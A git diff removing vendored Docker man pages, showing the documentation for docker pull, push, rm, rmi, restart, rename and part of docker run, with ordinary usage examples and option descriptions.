The default is *false*. - -**-s**, **--size**=*true*|*false* - Display total file sizes. The default is *false*. - -# EXAMPLES -# Display all containers, including non-running - - # docker ps -a - CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES - a87ecb4f327c fedora:20 /bin/sh -c #(nop) MA 20 minutes ago Exit 0 desperate_brattain - 01946d9d34d8 vpavlin/rhel7:latest /bin/sh -c #(nop) MA 33 minutes ago Exit 0 thirsty_bell - c1d3b0166030 acffc0358b9e /bin/sh -c yum -y up 2 weeks ago Exit 1 determined_torvalds - 41d50ecd2f57 fedora:20 /bin/sh -c #(nop) MA 2 weeks ago Exit 0 drunk_pike - -# Display only IDs of all containers, including non-running - - # docker ps -a -q - a87ecb4f327c - 01946d9d34d8 - c1d3b0166030 - 41d50ecd2f57 - -# Display only IDs of all containers that have the name `determined_torvalds` - - # docker ps -a -q --filter=name=determined_torvalds - c1d3b0166030 - -# Display containers with their commands - - # docker ps --format "{{.ID}}: {{.Command}}" - a87ecb4f327c: /bin/sh -c #(nop) MA - 01946d9d34d8: /bin/sh -c #(nop) MA - c1d3b0166030: /bin/sh -c yum -y up - 41d50ecd2f57: /bin/sh -c #(nop) MA - -# Display containers with their labels in a table - - # docker ps --format "table {{.ID}}\t{{.Labels}}" - CONTAINER ID LABELS - a87ecb4f327c com.docker.swarm.node=ubuntu,com.docker.swarm.storage=ssd - 01946d9d34d8 - c1d3b0166030 com.docker.swarm.node=debian,com.docker.swarm.cpu=6 - 41d50ecd2f57 com.docker.swarm.node=fedora,com.docker.swarm.cpu=3,com.docker.swarm.storage=ssd - -# Display containers with their node label in a table - - # docker ps --format 'table {{.ID}}\t{{(.Label "com.docker.swarm.node")}}' - CONTAINER ID NODE - a87ecb4f327c ubuntu - 01946d9d34d8 - c1d3b0166030 debian - 41d50ecd2f57 fedora - -# Display containers with `remote-volume` mounted - - $ docker ps --filter volume=remote-volume --format "table {{.ID}}\t{{.Mounts}}" - CONTAINER ID MOUNTS - 9c3527ed70ce remote-volume - -# Display containers with a volume mounted in `/data` - - $ 
docker ps --filter volume=/data --format "table {{.ID}}\t{{.Mounts}}" - CONTAINER ID MOUNTS - 9c3527ed70ce remote-volume - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -August 2014, updated by Sven Dowideit -November 2014, updated by Sven Dowideit -February 2015, updated by André Martins -October 2016, updated by Josh Horwitz diff --git a/vendor/github.com/docker/docker/man/docker-pull.1.md b/vendor/github.com/docker/docker/man/docker-pull.1.md deleted file mode 100644 index c61d005308..0000000000 --- a/vendor/github.com/docker/docker/man/docker-pull.1.md +++ /dev/null @@ -1,220 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-pull - Pull an image or a repository from a registry - -# SYNOPSIS -**docker pull** -[**-a**|**--all-tags**] -[**--help**] -NAME[:TAG] | [REGISTRY_HOST[:REGISTRY_PORT]/]NAME[:TAG] - -# DESCRIPTION - -This command pulls down an image or a repository from a registry. If -there is more than one image for a repository (e.g., fedora) then all -images for that repository name can be pulled down including any tags -(see the option **-a** or **--all-tags**). - -If you do not specify a `REGISTRY_HOST`, the command uses Docker's public -registry located at `registry-1.docker.io` by default. - -# OPTIONS -**-a**, **--all-tags**=*true*|*false* - Download all tagged images in the repository. The default is *false*. - -**--help** - Print usage statement - -# EXAMPLES - -### Pull an image from Docker Hub - -To download a particular image, or set of images (i.e., a repository), use -`docker pull`. If no tag is provided, Docker Engine uses the `:latest` tag as a -default. 
This command pulls the `debian:latest` image: - - $ docker pull debian - - Using default tag: latest - latest: Pulling from library/debian - fdd5d7827f33: Pull complete - a3ed95caeb02: Pull complete - Digest: sha256:e7d38b3517548a1c71e41bffe9c8ae6d6d29546ce46bf62159837aad072c90aa - Status: Downloaded newer image for debian:latest - -Docker images can consist of multiple layers. In the example above, the image -consists of two layers; `fdd5d7827f33` and `a3ed95caeb02`. - -Layers can be reused by images. For example, the `debian:jessie` image shares -both layers with `debian:latest`. Pulling the `debian:jessie` image therefore -only pulls its metadata, but not its layers, because all layers are already -present locally: - - $ docker pull debian:jessie - - jessie: Pulling from library/debian - fdd5d7827f33: Already exists - a3ed95caeb02: Already exists - Digest: sha256:a9c958be96d7d40df920e7041608f2f017af81800ca5ad23e327bc402626b58e - Status: Downloaded newer image for debian:jessie - -To see which images are present locally, use the **docker-images(1)** -command: - - $ docker images - - REPOSITORY TAG IMAGE ID CREATED SIZE - debian jessie f50f9524513f 5 days ago 125.1 MB - debian latest f50f9524513f 5 days ago 125.1 MB - -Docker uses a content-addressable image store, and the image ID is a SHA256 -digest covering the image's configuration and layers. In the example above, -`debian:jessie` and `debian:latest` have the same image ID because they are -actually the *same* image tagged with different names. Because they are the -same image, their layers are stored only once and do not consume extra disk -space. - -For more information about images, layers, and the content-addressable store, -refer to [understand images, containers, and storage drivers](https://docs.docker.com/engine/userguide/storagedriver/imagesandcontainers/) -in the online documentation. - - -## Pull an image by digest (immutable identifier) - -So far, you've pulled images by their name (and "tag"). 
Using names and tags is -a convenient way to work with images. When using tags, you can `docker pull` an -image again to make sure you have the most up-to-date version of that image. -For example, `docker pull ubuntu:14.04` pulls the latest version of the Ubuntu -14.04 image. - -In some cases you don't want images to be updated to newer versions, but prefer -to use a fixed version of an image. Docker enables you to pull an image by its -*digest*. When pulling an image by digest, you specify *exactly* which version -of an image to pull. Doing so, allows you to "pin" an image to that version, -and guarantee that the image you're using is always the same. - -To know the digest of an image, pull the image first. Let's pull the latest -`ubuntu:14.04` image from Docker Hub: - - $ docker pull ubuntu:14.04 - - 14.04: Pulling from library/ubuntu - 5a132a7e7af1: Pull complete - fd2731e4c50c: Pull complete - 28a2f68d1120: Pull complete - a3ed95caeb02: Pull complete - Digest: sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 - Status: Downloaded newer image for ubuntu:14.04 - -Docker prints the digest of the image after the pull has finished. In the example -above, the digest of the image is: - - sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 - -Docker also prints the digest of an image when *pushing* to a registry. This -may be useful if you want to pin to a version of the image you just pushed. 
- -A digest takes the place of the tag when pulling an image, for example, to -pull the above image by digest, run the following command: - - $ docker pull ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 - - sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2: Pulling from library/ubuntu - 5a132a7e7af1: Already exists - fd2731e4c50c: Already exists - 28a2f68d1120: Already exists - a3ed95caeb02: Already exists - Digest: sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 - Status: Downloaded newer image for ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 - -Digest can also be used in the `FROM` of a Dockerfile, for example: - - FROM ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 - MAINTAINER some maintainer - -> **Note**: Using this feature "pins" an image to a specific version in time. -> Docker will therefore not pull updated versions of an image, which may include -> security updates. If you want to pull an updated image, you need to change the -> digest accordingly. - -## Pulling from a different registry - -By default, `docker pull` pulls images from Docker Hub. It is also possible to -manually specify the path of a registry to pull from. For example, if you have -set up a local registry, you can specify its path to pull from it. A registry -path is similar to a URL, but does not contain a protocol specifier (`https://`). - -The following command pulls the `testing/test-image` image from a local registry -listening on port 5000 (`myregistry.local:5000`): - - $ docker pull myregistry.local:5000/testing/test-image - -Registry credentials are managed by **docker-login(1)**. - -Docker uses the `https://` protocol to communicate with a registry, unless the -registry is allowed to be accessed over an insecure connection. 
Refer to the -[insecure registries](https://docs.docker.com/engine/reference/commandline/daemon/#insecure-registries) -section in the online documentation for more information. - - -## Pull a repository with multiple images - -By default, `docker pull` pulls a *single* image from the registry. A repository -can contain multiple images. To pull all images from a repository, provide the -`-a` (or `--all-tags`) option when using `docker pull`. - -This command pulls all images from the `fedora` repository: - - $ docker pull --all-tags fedora - - Pulling repository fedora - ad57ef8d78d7: Download complete - 105182bb5e8b: Download complete - 511136ea3c5a: Download complete - 73bd853d2ea5: Download complete - .... - - Status: Downloaded newer image for fedora - -After the pull has completed use the `docker images` command to see the -images that were pulled. The example below shows all the `fedora` images -that are present locally: - - $ docker images fedora - - REPOSITORY TAG IMAGE ID CREATED SIZE - fedora rawhide ad57ef8d78d7 5 days ago 359.3 MB - fedora 20 105182bb5e8b 5 days ago 372.7 MB - fedora heisenbug 105182bb5e8b 5 days ago 372.7 MB - fedora latest 105182bb5e8b 5 days ago 372.7 MB - - -## Canceling a pull - -Killing the `docker pull` process, for example by pressing `CTRL-c` while it is -running in a terminal, will terminate the pull operation. - - $ docker pull fedora - - Using default tag: latest - latest: Pulling from library/fedora - a3ed95caeb02: Pulling fs layer - 236608c7b546: Pulling fs layer - ^C - -> **Note**: Technically, the Engine terminates a pull operation when the -> connection between the Docker Engine daemon and the Docker Engine client -> initiating the pull is lost. If the connection with the Engine daemon is -> lost for other reasons than a manual interaction, the pull is also aborted. - - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. 
-June 2014, updated by Sven Dowideit -August 2014, updated by Sven Dowideit -April 2015, updated by John Willis -April 2015, updated by Mary Anthony for v2 -September 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-push.1.md b/vendor/github.com/docker/docker/man/docker-push.1.md deleted file mode 100644 index 847e66d2e4..0000000000 --- a/vendor/github.com/docker/docker/man/docker-push.1.md +++ /dev/null @@ -1,63 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-push - Push an image or a repository to a registry - -# SYNOPSIS -**docker push** -[**--help**] -NAME[:TAG] | [REGISTRY_HOST[:REGISTRY_PORT]/]NAME[:TAG] - -# DESCRIPTION - -Use `docker push` to share your images to the [Docker Hub](https://hub.docker.com) -registry or to a self-hosted one. - -Refer to **docker-tag(1)** for more information about valid image and tag names. - -Killing the **docker push** process, for example by pressing **CTRL-c** while it -is running in a terminal, terminates the push operation. - -Registry credentials are managed by **docker-login(1)**. - - -# OPTIONS - -**--disable-content-trust** - Skip image verification (default true) - -**--help** - Print usage statement - -# EXAMPLES - -## Pushing a new image to a registry - -First save the new image by finding the container ID (using **docker ps**) -and then committing it to a new image name. Note that only a-z0-9-_. are -allowed when naming images: - - # docker commit c16378f943fe rhel-httpd - -Now, push the image to the registry using the image ID. In this example the -registry is on host named `registry-host` and listening on port `5000`. 
To do -this, tag the image with the host name or IP address, and the port of the -registry: - - # docker tag rhel-httpd registry-host:5000/myadmin/rhel-httpd - # docker push registry-host:5000/myadmin/rhel-httpd - -Check that this worked by running: - - # docker images - -You should see both `rhel-httpd` and `registry-host:5000/myadmin/rhel-httpd` -listed. - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -April 2015, updated by Mary Anthony for v2 -June 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-rename.1.md b/vendor/github.com/docker/docker/man/docker-rename.1.md deleted file mode 100644 index eaeea5c6e0..0000000000 --- a/vendor/github.com/docker/docker/man/docker-rename.1.md +++ /dev/null @@ -1,15 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% OCTOBER 2014 -# NAME -docker-rename - Rename a container - -# SYNOPSIS -**docker rename** -CONTAINER NEW_NAME - -# OPTIONS -There are no available options. - -# DESCRIPTION -Rename a container. Container may be running, paused or stopped. diff --git a/vendor/github.com/docker/docker/man/docker-restart.1.md b/vendor/github.com/docker/docker/man/docker-restart.1.md deleted file mode 100644 index 271c4eee1b..0000000000 --- a/vendor/github.com/docker/docker/man/docker-restart.1.md +++ /dev/null @@ -1,26 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-restart - Restart one or more containers - -# SYNOPSIS -**docker restart** -[**--help**] -[**-t**|**--time**[=*10*]] -CONTAINER [CONTAINER...] - -# DESCRIPTION -Restart each container listed. - -# OPTIONS -**--help** - Print usage statement - -**-t**, **--time**=*10* - Number of seconds to try to stop for before killing the container. Once killed it will then be restarted. Default is 10 seconds. 
- -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-rm.1.md b/vendor/github.com/docker/docker/man/docker-rm.1.md deleted file mode 100644 index 2105288d0d..0000000000 --- a/vendor/github.com/docker/docker/man/docker-rm.1.md +++ /dev/null @@ -1,72 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-rm - Remove one or more containers - -# SYNOPSIS -**docker rm** -[**-f**|**--force**] -[**-l**|**--link**] -[**-v**|**--volumes**] -CONTAINER [CONTAINER...] - -# DESCRIPTION - -**docker rm** will remove one or more containers from the host node. The -container name or ID can be used. This does not remove images. You cannot -remove a running container unless you use the **-f** option. To see all -containers on a host use the **docker ps -a** command. - -# OPTIONS -**--help** - Print usage statement - -**-f**, **--force**=*true*|*false* - Force the removal of a running container (uses SIGKILL). The default is *false*. - -**-l**, **--link**=*true*|*false* - Remove the specified link and not the underlying container. The default is *false*. - -**-v**, **--volumes**=*true*|*false* - Remove the volumes associated with the container. The default is *false*. - -# EXAMPLES - -## Removing a container using its ID - -To remove a container using its ID, find either from a **docker ps -a** -command, or use the ID returned from the **docker run** command, or retrieve -it from a file used to store it using the **docker run --cidfile**: - - docker rm abebf7571666 - -## Removing a container using the container name - -The name of the container can be found using the **docker ps -a** -command. 
The use that name as follows: - - docker rm hopeful_morse - -## Removing a container and all associated volumes - - $ docker rm -v redis - redis - -This command will remove the container and any volumes associated with it. -Note that if a volume was specified with a name, it will not be removed. - - $ docker create -v awesome:/foo -v /bar --name hello redis - hello - $ docker rm -v hello - -In this example, the volume for `/foo` will remain in tact, but the volume for -`/bar` will be removed. The same behavior holds for volumes inherited with -`--volumes-from`. - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -July 2014, updated by Sven Dowideit -August 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-rmi.1.md b/vendor/github.com/docker/docker/man/docker-rmi.1.md deleted file mode 100644 index 35bf8aac6a..0000000000 --- a/vendor/github.com/docker/docker/man/docker-rmi.1.md +++ /dev/null @@ -1,42 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-rmi - Remove one or more images - -# SYNOPSIS -**docker rmi** -[**-f**|**--force**] -[**--help**] -[**--no-prune**] -IMAGE [IMAGE...] - -# DESCRIPTION - -Removes one or more images from the host node. This does not remove images from -a registry. You cannot remove an image of a running container unless you use the -**-f** option. To see all images on a host use the **docker images** command. - -# OPTIONS -**-f**, **--force**=*true*|*false* - Force removal of the image. The default is *false*. - -**--help** - Print usage statement - -**--no-prune**=*true*|*false* - Do not delete untagged parents. The default is *false*. 
- -# EXAMPLES - -## Removing an image - -Here is an example of removing an image: - - docker rmi fedora/httpd - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -April 2015, updated by Mary Anthony for v2 diff --git a/vendor/github.com/docker/docker/man/docker-run.1.md b/vendor/github.com/docker/docker/man/docker-run.1.md deleted file mode 100644 index 8c1018a1e2..0000000000 --- a/vendor/github.com/docker/docker/man/docker-run.1.md +++ /dev/null @@ -1,1055 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-run - Run a command in a new container - -# SYNOPSIS -**docker run** -[**-a**|**--attach**[=*[]*]] -[**--add-host**[=*[]*]] -[**--blkio-weight**[=*[BLKIO-WEIGHT]*]] -[**--blkio-weight-device**[=*[]*]] -[**--cpu-shares**[=*0*]] -[**--cap-add**[=*[]*]] -[**--cap-drop**[=*[]*]] -[**--cgroup-parent**[=*CGROUP-PATH*]] -[**--cidfile**[=*CIDFILE*]] -[**--cpu-count**[=*0*]] -[**--cpu-percent**[=*0*]] -[**--cpu-period**[=*0*]] -[**--cpu-quota**[=*0*]] -[**--cpu-rt-period**[=*0*]] -[**--cpu-rt-runtime**[=*0*]] -[**--cpus**[=*0.0*]] -[**--cpuset-cpus**[=*CPUSET-CPUS*]] -[**--cpuset-mems**[=*CPUSET-MEMS*]] -[**-d**|**--detach**] -[**--detach-keys**[=*[]*]] -[**--device**[=*[]*]] -[**--device-read-bps**[=*[]*]] -[**--device-read-iops**[=*[]*]] -[**--device-write-bps**[=*[]*]] -[**--device-write-iops**[=*[]*]] -[**--dns**[=*[]*]] -[**--dns-option**[=*[]*]] -[**--dns-search**[=*[]*]] -[**-e**|**--env**[=*[]*]] -[**--entrypoint**[=*ENTRYPOINT*]] -[**--env-file**[=*[]*]] -[**--expose**[=*[]*]] -[**--group-add**[=*[]*]] -[**-h**|**--hostname**[=*HOSTNAME*]] -[**--help**] -[**--init**] -[**--init-path**[=*[]*]] -[**-i**|**--interactive**] -[**--ip**[=*IPv4-ADDRESS*]] -[**--ip6**[=*IPv6-ADDRESS*]] -[**--ipc**[=*IPC*]] -[**--isolation**[=*default*]] -[**--kernel-memory**[=*KERNEL-MEMORY*]] 
-[**-l**|**--label**[=*[]*]] -[**--label-file**[=*[]*]] -[**--link**[=*[]*]] -[**--link-local-ip**[=*[]*]] -[**--log-driver**[=*[]*]] -[**--log-opt**[=*[]*]] -[**-m**|**--memory**[=*MEMORY*]] -[**--mac-address**[=*MAC-ADDRESS*]] -[**--memory-reservation**[=*MEMORY-RESERVATION*]] -[**--memory-swap**[=*LIMIT*]] -[**--memory-swappiness**[=*MEMORY-SWAPPINESS*]] -[**--name**[=*NAME*]] -[**--network-alias**[=*[]*]] -[**--network**[=*"bridge"*]] -[**--oom-kill-disable**] -[**--oom-score-adj**[=*0*]] -[**-P**|**--publish-all**] -[**-p**|**--publish**[=*[]*]] -[**--pid**[=*[PID]*]] -[**--userns**[=*[]*]] -[**--pids-limit**[=*PIDS_LIMIT*]] -[**--privileged**] -[**--read-only**] -[**--restart**[=*RESTART*]] -[**--rm**] -[**--security-opt**[=*[]*]] -[**--storage-opt**[=*[]*]] -[**--stop-signal**[=*SIGNAL*]] -[**--stop-timeout**[=*TIMEOUT*]] -[**--shm-size**[=*[]*]] -[**--sig-proxy**[=*true*]] -[**--sysctl**[=*[]*]] -[**-t**|**--tty**] -[**--tmpfs**[=*[CONTAINER-DIR[:]*]] -[**-u**|**--user**[=*USER*]] -[**--ulimit**[=*[]*]] -[**--uts**[=*[]*]] -[**-v**|**--volume**[=*[[HOST-DIR:]CONTAINER-DIR[:OPTIONS]]*]] -[**--volume-driver**[=*DRIVER*]] -[**--volumes-from**[=*[]*]] -[**-w**|**--workdir**[=*WORKDIR*]] -IMAGE [COMMAND] [ARG...] - -# DESCRIPTION - -Run a process in a new container. **docker run** starts a process with its own -file system, its own networking, and its own isolated process tree. The IMAGE -which starts the process may define defaults related to the process that will be -run in the container, the networking to expose, and more, but **docker run** -gives final control to the operator or administrator who starts the container -from the image. For that reason **docker run** has more options than any other -Docker command. - -If the IMAGE is not already loaded then **docker run** will pull the IMAGE, and -all image dependencies, from the repository in the same way running **docker -pull** IMAGE, before it starts the container from that image. 
- -# OPTIONS -**-a**, **--attach**=[] - Attach to STDIN, STDOUT or STDERR. - - In foreground mode (the default when **-d** -is not specified), **docker run** can start the process in the container -and attach the console to the process's standard input, output, and standard -error. It can even pretend to be a TTY (this is what most commandline -executables expect) and pass along signals. The **-a** option can be set for -each of stdin, stdout, and stderr. - -**--add-host**=[] - Add a custom host-to-IP mapping (host:ip) - - Add a line to /etc/hosts. The format is hostname:ip. The **--add-host** -option can be set multiple times. - -**--blkio-weight**=*0* - Block IO weight (relative weight) accepts a weight value between 10 and 1000. - -**--blkio-weight-device**=[] - Block IO weight (relative device weight, format: `DEVICE_NAME:WEIGHT`). - -**--cpu-shares**=*0* - CPU shares (relative weight) - - By default, all containers get the same proportion of CPU cycles. This proportion -can be modified by changing the container's CPU share weighting relative -to the weighting of all other running containers. - -To modify the proportion from the default of 1024, use the **--cpu-shares** -flag to set the weighting to 2 or higher. - -The proportion will only apply when CPU-intensive processes are running. -When tasks in one container are idle, other containers can use the -left-over CPU time. The actual amount of CPU time will vary depending on -the number of containers running on the system. - -For example, consider three containers, one has a cpu-share of 1024 and -two others have a cpu-share setting of 512. When processes in all three -containers attempt to use 100% of CPU, the first container would receive -50% of the total CPU time. If you add a fourth container with a cpu-share -of 1024, the first container only gets 33% of the CPU. The remaining containers -receive 16.5%, 16.5% and 33% of the CPU. 
- -On a multi-core system, the shares of CPU time are distributed over all CPU -cores. Even if a container is limited to less than 100% of CPU time, it can -use 100% of each individual CPU core. - -For example, consider a system with more than three cores. If you start one -container **{C0}** with **-c=512** running one process, and another container -**{C1}** with **-c=1024** running two processes, this can result in the following -division of CPU shares: - - PID container CPU CPU share - 100 {C0} 0 100% of CPU0 - 101 {C1} 1 100% of CPU1 - 102 {C1} 2 100% of CPU2 - -**--cap-add**=[] - Add Linux capabilities - -**--cap-drop**=[] - Drop Linux capabilities - -**--cgroup-parent**="" - Path to cgroups under which the cgroup for the container will be created. If the path is not absolute, the path is considered to be relative to the cgroups path of the init process. Cgroups will be created if they do not already exist. - -**--cidfile**="" - Write the container ID to the file - -**--cpu-count**=*0* - Limit the number of CPUs available for execution by the container. - - On Windows Server containers, this is approximated as a percentage of total CPU usage. - - On Windows Server containers, the processor resource controls are mutually exclusive, the order of precedence is CPUCount first, then CPUShares, and CPUPercent last. - -**--cpu-percent**=*0* - Limit the percentage of CPU available for execution by a container running on a Windows daemon. - - On Windows Server containers, the processor resource controls are mutually exclusive, the order of precedence is CPUCount first, then CPUShares, and CPUPercent last. - -**--cpu-period**=*0* - Limit the CPU CFS (Completely Fair Scheduler) period - - Limit the container's CPU usage. This flag tell the kernel to restrict the container's CPU usage to the period you specify. - -**--cpuset-cpus**="" - CPUs in which to allow execution (0-3, 0,1) - -**--cpuset-mems**="" - Memory nodes (MEMs) in which to allow execution (0-3, 0,1). 
Only effective on NUMA systems. - - If you have four memory nodes on your system (0-3), use `--cpuset-mems=0,1` -then processes in your Docker container will only use memory from the first -two memory nodes. - -**--cpu-quota**=*0* - Limit the CPU CFS (Completely Fair Scheduler) quota - - Limit the container's CPU usage. By default, containers run with the full -CPU resource. This flag tell the kernel to restrict the container's CPU usage -to the quota you specify. - -**--cpu-rt-period**=0 - Limit the CPU real-time period in microseconds - - Limit the container's Real Time CPU usage. This flag tell the kernel to restrict the container's Real Time CPU usage to the period you specify. - -**--cpu-rt-runtime**=0 - Limit the CPU real-time runtime in microseconds - - Limit the containers Real Time CPU usage. This flag tells the kernel to limit the amount of time in a given CPU period Real Time tasks may consume. Ex: - Period of 1,000,000us and Runtime of 950,000us means that this container could consume 95% of available CPU and leave the remaining 5% to normal priority tasks. - - The sum of all runtimes across containers cannot exceed the amount allotted to the parent cgroup. - -**--cpus**=0.0 - Number of CPUs. The default is *0.0* which means no limit. - -**-d**, **--detach**=*true*|*false* - Detached mode: run the container in the background and print the new container ID. The default is *false*. - - At any time you can run **docker ps** in -the other shell to view a list of the running containers. You can reattach to a -detached container with **docker attach**. If you choose to run a container in -the detached mode, then you cannot use the **-rm** option. - - When attached in the tty mode, you can detach from the container (and leave it -running) using a configurable key sequence. The default sequence is `CTRL-p CTRL-q`. -You configure the key sequence using the **--detach-keys** option or a configuration file. 
-See **config-json(5)** for documentation on using a configuration file. - -**--detach-keys**="" - Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-` where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. - -**--device**=[] - Add a host device to the container (e.g. --device=/dev/sdc:/dev/xvdc:rwm) - -**--device-read-bps**=[] - Limit read rate from a device (e.g. --device-read-bps=/dev/sda:1mb) - -**--device-read-iops**=[] - Limit read rate from a device (e.g. --device-read-iops=/dev/sda:1000) - -**--device-write-bps**=[] - Limit write rate to a device (e.g. --device-write-bps=/dev/sda:1mb) - -**--device-write-iops**=[] - Limit write rate to a device (e.g. --device-write-iops=/dev/sda:1000) - -**--dns-search**=[] - Set custom DNS search domains (Use --dns-search=. if you don't wish to set the search domain) - -**--dns-option**=[] - Set custom DNS options - -**--dns**=[] - Set custom DNS servers - - This option can be used to override the DNS -configuration passed to the container. Typically this is necessary when the -host DNS configuration is invalid for the container (e.g., 127.0.0.1). When this -is the case the **--dns** flags is necessary for every run. - -**-e**, **--env**=[] - Set environment variables - - This option allows you to specify arbitrary -environment variables that are available for the process that will be launched -inside of the container. - -**--entrypoint**="" - Overwrite the default ENTRYPOINT of the image - - This option allows you to overwrite the default entrypoint of the image that -is set in the Dockerfile. The ENTRYPOINT of an image is similar to a COMMAND -because it specifies what executable to run when the container starts, but it is -(purposely) more difficult to override. 
The ENTRYPOINT gives a container its -default nature or behavior, so that when you set an ENTRYPOINT you can run the -container as if it were that binary, complete with default options, and you can -pass in more options via the COMMAND. But, sometimes an operator may want to run -something else inside the container, so you can override the default ENTRYPOINT -at runtime by using a **--entrypoint** and a string to specify the new -ENTRYPOINT. - -**--env-file**=[] - Read in a line delimited file of environment variables - -**--expose**=[] - Expose a port, or a range of ports (e.g. --expose=3300-3310) informs Docker -that the container listens on the specified network ports at runtime. Docker -uses this information to interconnect containers using links and to set up port -redirection on the host system. - -**--group-add**=[] - Add additional groups to run as - -**-h**, **--hostname**="" - Container host name - - Sets the container host name that is available inside the container. - -**--help** - Print usage statement - -**--init** - Run an init inside the container that forwards signals and reaps processes - -**--init-path**="" - Path to the docker-init binary - -**-i**, **--interactive**=*true*|*false* - Keep STDIN open even if not attached. The default is *false*. - - When set to true, keep stdin open even if not attached. The default is false. - -**--ip**="" - Sets the container's interface IPv4 address (e.g. 172.23.0.9) - - It can only be used in conjunction with **--network** for user-defined networks - -**--ip6**="" - Sets the container's interface IPv6 address (e.g. 2001:db8::1b99) - - It can only be used in conjunction with **--network** for user-defined networks - -**--ipc**="" - Default is to create a private IPC namespace (POSIX SysV IPC) for the container - 'container:': reuses another container shared memory, semaphores and message queues - 'host': use the host shared memory,semaphores and message queues inside the container. 
Note: the host mode gives the container full access to local shared memory and is therefore considered insecure. - -**--isolation**="*default*" - Isolation specifies the type of isolation technology used by containers. Note -that the default on Windows server is `process`, and the default on Windows client -is `hyperv`. Linux only supports `default`. - -**-l**, **--label**=[] - Set metadata on the container (e.g., --label com.example.key=value) - -**--kernel-memory**="" - Kernel memory limit (format: `[]`, where unit = b, k, m or g) - - Constrains the kernel memory available to a container. If a limit of 0 -is specified (not using `--kernel-memory`), the container's kernel memory -is not limited. If you specify a limit, it may be rounded up to a multiple -of the operating system's page size and the value can be very large, -millions of trillions. - -**--label-file**=[] - Read in a line delimited file of labels - -**--link**=[] - Add link to another container in the form of :alias or just -in which case the alias will match the name - - If the operator -uses **--link** when starting the new client container, then the client -container can access the exposed port via a private networking interface. Docker -will set some environment variables in the client container to help indicate -which interface and port to use. - -**--link-local-ip**=[] - Add one or more link-local IPv4/IPv6 addresses to the container's interface - -**--log-driver**="*json-file*|*syslog*|*journald*|*gelf*|*fluentd*|*awslogs*|*splunk*|*etwlogs*|*gcplogs*|*none*" - Logging driver for the container. Default is defined by daemon `--log-driver` flag. - **Warning**: the `docker logs` command works only for the `json-file` and - `journald` logging drivers. - -**--log-opt**=[] - Logging driver specific options. - -**-m**, **--memory**="" - Memory limit (format: [], where unit = b, k, m or g) - - Allows you to constrain the memory available to a container. 
If the host -supports swap memory, then the **-m** memory setting can be larger than physical -RAM. If a limit of 0 is specified (not using **-m**), the container's memory is -not limited. The actual limit may be rounded up to a multiple of the operating -system's page size (the value would be very large, that's millions of trillions). - -**--memory-reservation**="" - Memory soft limit (format: [], where unit = b, k, m or g) - - After setting memory reservation, when the system detects memory contention -or low memory, containers are forced to restrict their consumption to their -reservation. So you should always set the value below **--memory**, otherwise the -hard limit will take precedence. By default, memory reservation will be the same -as memory limit. - -**--memory-swap**="LIMIT" - A limit value equal to memory plus swap. Must be used with the **-m** -(**--memory**) flag. The swap `LIMIT` should always be larger than **-m** -(**--memory**) value. By default, the swap `LIMIT` will be set to double -the value of --memory. - - The format of `LIMIT` is `[]`. Unit can be `b` (bytes), -`k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you don't specify a -unit, `b` is used. Set LIMIT to `-1` to enable unlimited swap. - -**--mac-address**="" - Container MAC address (e.g. 92:d0:c6:0a:29:33) - - Remember that the MAC address in an Ethernet network must be unique. -The IPv6 link-local address will be based on the device's MAC address -according to RFC4862. - -**--name**="" - Assign a name to the container - - The operator can identify a container in three ways: - UUID long identifier (“f78375b1c487e03c9438c729345e54db9d20cfa2ac1fc3494b6eb60872e74778”) - UUID short identifier (“f78375b1c487”) - Name (“jonah”) - - The UUID identifiers come from the Docker daemon, and if a name is not assigned -to the container with **--name** then the daemon will also generate a random -string name. 
